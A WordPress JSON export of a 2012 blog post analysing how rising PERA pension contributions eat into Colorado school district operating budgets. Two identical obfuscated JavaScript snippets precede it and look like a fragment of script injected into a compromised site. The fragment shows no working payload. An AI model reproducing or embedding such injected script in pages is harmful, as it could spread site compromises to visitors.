<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script>{"id":1985,"date":"2012-07-06T15:06:16","date_gmt":"2012-07-06T22:06:16","guid":{"rendered":"http:\/\/www.jsharf.com\/view\/?p=1985"},"modified":"2012-07-12T11:05:34","modified_gmt":"2012-07-12T18:05:34","slug":"devouring-the-school-budget-from-within","status":"publish","type":"post","link":"https:\/\/www.jsharf.com\/view\/?p=1985","title":{"rendered":"Devouring the School Budget From Within"},"content":{"rendered":"<p>PERA&#8217;s problems don&#8217;t stop with the state. \u00a0While the Colorado government has consistently shorted PERA on its Annual Contribution\u00a0(theoretical) Requirement, local school districts have less flexibility in kicking the can down the road. \u00a0As a result, their PERA contributions have increased rapidly, in some cases very rapidly, over the last decade or so. \u00a0Here are the compound annual growth rates for four of the largest school districts from 2003 &#8211; 2011 (except for Cherry Creek, for which data was only available starting in 2006).<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone\" src=\"http:\/\/www.jsharf.com\/images\/PERA\/PERA-CAGR.jpg\" alt=\"\" width=\"481\" height=\"289\" \/><\/p>\n<p>These numbers include all PERA contributions, both to the School Trust Fund and to the Health Care Trust Fund HCTF).<\/p>\n<p>What does this mean for school budgets? \u00a0Well, taking the Schedule 4 disclosures in the Statistical sections, we can derive the annual operating expenditures. \u00a0For the government funds, we take the total expenses, subtract out the CapEx and the Debt Service, and then divide that number into the annual PERA contribution (described three years rolling in the Financial Section Notes).<\/p>\n<p>The result? \u00a0Not pretty:<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone\" src=\"http:\/\/www.jsharf.com\/images\/PERA\/PctOpExp.jpg\" alt=\"\" width=\"481\" height=\"289\" \/><\/p>\n<p>The role of debt service in school finance is another matter well worth examining, but in this case, adding it in would just alter the level, not the trend. \u00a0But consider that in JeffCo, 1 in every 9 dollars goes to PERA.
